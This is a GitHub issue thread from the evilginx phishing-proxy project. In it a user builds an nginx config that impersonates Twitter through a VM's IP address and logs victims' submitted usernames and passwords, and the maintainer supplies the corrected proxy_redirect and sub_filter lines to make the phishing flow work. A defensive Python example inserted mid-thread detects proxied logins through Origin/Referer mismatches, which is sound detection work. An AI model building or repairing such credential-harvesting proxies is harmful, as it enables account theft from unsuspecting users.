kgretzky / evilginx

PLEASE USE NEW VERSION: https://github.com/kgretzky/evilginx2
MIT License

Twitter Config #33

Closed angelic-red closed 6 years ago

angelic-red commented 7 years ago

Hi there,

Awesome project you got going on here!

I've been trying to set up a config for Twitter and I'm having a little trouble. I wanted to start small, so right now the focus is to just capture the username and password in the POST request. Thus I've stripped anything I believe to be cookie / SSL related.

My config at the moment is this.

log_format twitter_phish '{"remote_addr":"$remote_addr","time":"$time_local","host":"$http_host","request":"$request","status":"$status","referer":"$http_referer","ua":"$http_user_agent","conn":"$connection","body":"$request_body"}';
location / {
    proxy_pass https://twitter.com/;
    proxy_cookie_domain twitter.com 192.168.60.133;
    proxy_redirect https://twitter.com/ 192.168.60.133/;

    sub_filter 'https://twitter.com/' '192.168.60.133/';
    sub_filter_once off;
    sub_filter_types *;

    proxy_set_header Accept-Encoding "";
    proxy_set_header X-Real-IP $remote_addr;
    proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

    access_log /var/log/evilginx-twitter.log twitter_phish;
}

As you've probably noticed, I don't have a domain setup yet so I'm using a VM's IP to substitute.

I can successfully proxy Twitter. The error happens after I try to login. A request is sent to https://twitter.com/sessions to validate the form data and in /var/log/evilginx-twitter.log I can see the credentials. https://twitter.com/sessions is supposed to redirect me to twitter.com after validation but I get a proxied 404 error. My browser tried to make a request to 192.168.60.133/192.168.60.133/sessions and that is what I see in my address bar.

I think I might be using the sub_filter directive incorrectly, or perhaps I'm not understanding the proxy. Would I need another config to handle requests/redirects to https://twitter.com/sessions, or am I not doing something right?

Regards

kgretzky commented 7 years ago

Hi, thanks!

I think you are missing https:// in the proxy_redirect and sub_filter rules; this is why it redirects you thinking that the IP address is a relative path of the URL.

    proxy_redirect https://twitter.com/ https://192.168.60.133/;

    sub_filter 'https://twitter.com/' 'https://192.168.60.133/';

angelic-red commented 7 years ago

Hey kgretzky,

I tried what you suggested and I still was not successfully logged in and redirected to the legitimate Twitter. Instead, the web page became unreachable.

I noticed that in my requests the origin/referrer is always the address of my VM. Could that be the culprit? In a legitimate Twitter login those are set to https://twitter.com/
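The Origin/Referer mismatch noticed in the comment above is also the signal a site operator can use to spot logins arriving through a reverse proxy. The following is an added example written for this page from the defender's side; it is not part of the issue or of the evilginx project. It checks a login POST's Origin and Referer hosts against the site's own host, and runs the same check over a few constructed JSON access-log lines (the field names, and the assumption that the log also records $http_origin, are this example's own, not the format from the issue).

```python
"""Defender-side check: flag login POSTs whose Origin/Referer do not name
the site's own host. Added example, not code from the issue or project."""
import json
from urllib.parse import urlsplit

# Constructed value: the host the legitimate login form is served from.
EXPECTED_HOST = "twitter.com"


def header_host(value):
    """Return the lowercase host part of an Origin/Referer value, or None."""
    if not value or value == "-":
        return None
    host = urlsplit(value).hostname
    return host.lower() if host else None


def classify_login_post(headers, expected_host=EXPECTED_HOST):
    """Return 'ok', 'missing' or 'mismatch' for the headers of a login POST.

    A host equal to expected_host, or a subdomain of it, is accepted; any
    other host (for example a proxy's IP address) is a mismatch.
    """
    origin = header_host(headers.get("Origin"))
    referer = header_host(headers.get("Referer"))
    if origin is None and referer is None:
        return "missing"
    for host in (origin, referer):
        if host is None:
            continue
        if host != expected_host and not host.endswith("." + expected_host):
            return "mismatch"
    return "ok"


# Constructed access-log lines in a JSON layout of this example's own;
# "origin" assumes the log format also records $http_origin.
SAMPLE_LOG = [
    '{"remote_addr":"203.0.113.7","request":"POST /sessions HTTP/1.1",'
    '"referer":"https://twitter.com/login","origin":"https://twitter.com"}',
    '{"remote_addr":"198.51.100.4","request":"POST /sessions HTTP/1.1",'
    '"referer":"http://192.168.60.133/login","origin":"http://192.168.60.133"}',
    '{"remote_addr":"198.51.100.9","request":"GET / HTTP/1.1",'
    '"referer":"-","origin":"-"}',
]


def flag_proxied_logins(lines, expected_host=EXPECTED_HOST, login_path="/sessions"):
    """Return (remote_addr, verdict) for each login POST that is not 'ok'."""
    flagged = []
    for line in lines:
        entry = json.loads(line)
        if not entry.get("request", "").startswith("POST " + login_path + " "):
            continue  # only the login endpoint is of interest
        headers = {"Origin": entry.get("origin"), "Referer": entry.get("referer")}
        verdict = classify_login_post(headers, expected_host)
        if verdict != "ok":
            flagged.append((entry["remote_addr"], verdict))
    return flagged


if __name__ == "__main__":
    for addr, verdict in flag_proxied_logins(SAMPLE_LOG):
        print(f"{addr}: login POST with {verdict} Origin/Referer")
```

The check is the same one a CSRF defence performs, so it can live in the login handler rather than in a log scan; a "missing" verdict is worth logging separately, since browsers normally send at least one of the two headers on a same-site form POST.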

kgretzky commented 7 years ago

Try to copy the site config file from one of the included examples and modify that one instead of creating your own. The whole Evilginx functionality relies on properly crafted site config files, and it is crucial that you work on current examples rather than create one from scratch.